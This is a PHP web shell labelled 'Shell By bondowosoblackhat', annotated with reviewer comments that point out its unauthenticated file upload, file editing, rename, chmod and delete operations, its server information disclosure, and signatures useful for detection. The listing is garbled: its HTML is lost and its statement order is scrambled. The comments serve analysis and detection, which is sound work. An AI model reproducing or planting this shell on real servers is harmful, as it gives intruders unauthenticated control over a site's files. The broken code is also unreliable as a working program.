$value){
$_POST[$key] = stripslashes($value);
}
}

// Page header of a PHP web shell (browser-driven file manager). The HTML that
// originally sat inside these echo strings was lost in extraction; only the
// text nodes remain. The banner text below is a fixed literal, so it can serve
// as a content signature when scanning a web root.
echo ‘


Shell By bondowosoblackhat

Shell By bondowosoblackhat


[+] bondowosoblackhat [+]

‘;
// Environment disclosure: prints the requester's address (REMOTE_ADDR), the
// address HTTP_HOST resolves to, SERVER_NAME, and the php_uname() OS/kernel
// string to whoever loads the page.
echo “


: “.$_SERVER[‘REMOTE_ADDR’].”


: “.gethostbyname($_SERVER[‘HTTP_HOST’]).” / “.$_SERVER[‘SERVER_NAME’].”


: “.php_uname().”

“;

echo ‘

‘;
// Request dispatch for the file manager. Statement order in this listing was
// scrambled by extraction, so the branch bodies below do not line up with the
// original control flow; the individual sinks are still readable.
// No access check on the requester appears anywhere in these lines.
// Request fields read here: GET filesrc, path, option, opt; POST opt, path,
// perm, newname, src, type; upload field "file". These names are usable as
// markers when reviewing web-server access logs or WAF telemetry.
if(isset($_GET[‘filesrc’])){
echo “

‘;

// $path is taken straight from the query string. The only processing is
// backslash-to-slash normalisation; there is no base-directory or allow-list
// check, so every later filesystem call operates wherever the request points.
if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
}else{
$path = getcwd();
}
$path = str_replace(‘\\’,’/’,$path);
$paths = explode(‘/’,$path);

// Breadcrumb rendering: each path segment is echoed without HTML escaping.
foreach($paths as $id=>$pat){
if($pat == ” && $id == 0){
$a = true;
echo ‘ : /‘;
continue;
}
if($pat == ”) continue;
echo ‘‘.$pat.’/’;
}

// Upload: the temp file is copied to $path plus the client-supplied file name.
// copy() is used on tmp_name with no is_uploaded_file()/move_uploaded_file()
// check, and the name is not filtered for extension, type or "../" segments.
echo ‘

Upload File:
‘;
if(isset($_FILES[‘file’])){
if(copy($_FILES[‘file’][‘tmp_name’],$path.’/’.$_FILES[‘file’][‘name’])){
echo ‘

UPLOAD SUCCES !!!!
‘;
}else{
echo ‘‘;
}
}

echo ‘

files >> “;
// The filesrc parameter is reflected into the page without escaping.
echo $_GET[‘filesrc’];
echo ‘

‘;
echo(‘ ‘);
}elseif(isset($_GET[‘option’]) && $_POST[‘opt’] != ‘delete’){
// Reached when GET option is set and POST opt is anything other than
// "delete". POST path is echoed back unescaped.
echo ‘

‘.$_POST[‘path’].’

‘;

// chmod: POST path and POST perm go to chmod() exactly as received.
// NOTE(review): perm arrives as a string while chmod() takes an integer mode,
// so the bits applied probably differ from the digits submitted - confirm.
if($_POST[‘opt’] == ‘chmod’){
if(isset($_POST[‘perm’])){
if(chmod($_POST[‘path’],$_POST[‘perm’])){
echo ‘

CHANGE PERMISSION SUCCESS !!
‘;
}else{
echo ‘‘;
}
}
echo ‘

Permission :



‘;
}

// rename folder: unlike the sibling branches this one reads opt from GET, and
// in the visible lines it only prints a form; $cwd is assigned but never used.
elseif($_GET[‘opt’] == ‘btw’){
$cwd = getcwd();
echo ‘

New Name :



‘;
}

// rename file: moves POST path to $path/newname. Source and destination are
// both request-controlled and neither is validated.
elseif($_POST[‘opt’] == ‘rename’){
if(isset($_POST[‘newname’])){
if(rename($_POST[‘path’],$path.’/’.$_POST[‘newname’])){
echo ‘

CHANGE NAME SUCCESS !!
‘;
}else{
echo ‘‘;
}
$_POST[‘name’] = $_POST[‘newname’];
}
echo ‘

New Name :



‘;
}

// edit file: opens POST path in "w" mode (truncating it) and writes POST src
// into it. The fopen() result is not checked before fwrite()/fclose().
elseif($_POST[‘opt’] == ‘edit’){
if(isset($_POST[‘src’])){
$fp = fopen($_POST[‘path’],’w’);
if(fwrite($fp,$_POST[‘src’])){
echo ‘

EDIT FILE SUCCESS !!
‘;
}else{
echo ‘‘;
}
fclose($fp);
}
echo ‘





‘;
}
echo ‘

‘;
}else{
echo ‘

‘;

// delete dir: rmdir() on the POST-supplied path when POST type is "dir".
if(isset($_GET[‘option’]) && $_POST[‘opt’] == ‘delete’){
if($_POST[‘type’] == ‘dir’){
if(rmdir($_POST[‘path’])){
echo ‘

DELETE DIR SUCCESS !!
‘;
}else{
echo ‘>’;
}
}

// delete file: unlink() on the POST-supplied path when POST type is "file".
elseif($_POST[‘type’] == ‘file’){
if(unlink($_POST[‘path’])){
echo ‘

DELETE FILE SUCCESS !!
‘;
}else{
echo ‘‘;
}
}
}

?>
‘;
$scandir = scandir($path);
$pa = getcwd();
echo ‘

‘;

foreach($scandir as $dir){
if(!is_dir(“$path/$dir”) || $dir == ‘.’ || $dir == ‘..’) continue;
echo “

“;
}

echo ‘

‘;
foreach($scandir as $file){
if(!is_file(“$path/$file”)) continue;
$size = filesize(“$path/$file”)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).’ MB’;
}else{
$size = $size.’ KB’;
}

echo “

“;
}
echo ‘

Name
Size
Perm
Options
$dir
DIR
“;
if(is_writable(“$path/$dir”)) echo ‘‘;
elseif(!is_readable(“$path/$dir”)) echo ‘‘;
echo perms(“$path/$dir”);
if(is_writable(“$path/$dir”) || !is_readable(“$path/$dir”)) echo ‘
‘;

echo “





\” style=\”margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\”/>

$file
“.$size.”
“;
if(is_writable(“$path/$file”)) echo ‘‘;
elseif(!is_readable(“$path/$file”)) echo ‘‘;
echo perms(“$path/$file”);
if(is_writable(“$path/$file”) || !is_readable(“$path/$file”)) echo ‘
‘;

echo “





\” style=\”margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\”/>

‘;
}
echo ‘


Copyright ©2017 || bondowosoblackhat


‘;
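/**
 * Render a path's mode bits as a ten-character, ls-style string such as "-rw-r--r--".
 *
 * The first character is the file type, taken from the high bits returned by
 * fileperms(): s socket, l symlink, - regular, b block, d directory,
 * c character device, p FIFO, u unknown. The remaining nine characters are the
 * owner/group/world read, write and execute flags, with setuid and setgid shown
 * as s/S in the execute slots and the sticky bit as t/T.
 *
 * The listing this function came from used typographic quotes as string
 * delimiters, which PHP does not parse as strings; they are plain ASCII here.
 *
 * @param string $file Path handed to fileperms().
 * @return string Type character followed by nine permission characters.
 */
function perms($file)
{
    $perms = fileperms($file);
    if ($perms === false) {
        // fileperms() failed and has already raised a warning. Continue with
        // no bits set so the caller gets "u---------" rather than a type error.
        $perms = 0;
    }

    // Type masks in test order: the composite masks (socket, symlink) must be
    // tried before the single-bit masks they contain.
    $types = [
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    ];

    $info = 'u'; // unknown until a mask matches
    foreach ($types as $mask => $char) {
        if (($perms & $mask) === $mask) {
            $info = $char;
            break;
        }
    }

    // One row per class: read bit, write bit, execute bit, special bit, and the
    // letter shown when the special bit is set (lower case if execute is also set).
    $classes = [
        [0x0100, 0x0080, 0x0040, 0x0800, 's'], // owner / setuid
        [0x0020, 0x0010, 0x0008, 0x0400, 's'], // group / setgid
        [0x0004, 0x0002, 0x0001, 0x0200, 't'], // world / sticky
    ];

    foreach ($classes as $row) {
        list($read, $write, $exec, $special, $letter) = $row;

        $info .= ($perms & $read) ? 'r' : '-';
        $info .= ($perms & $write) ? 'w' : '-';

        if ($perms & $exec) {
            $info .= ($perms & $special) ? $letter : 'x';
        } else {
            $info .= ($perms & $special) ? strtoupper($letter) : '-';
        }
    }

    return $info;
}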
?>
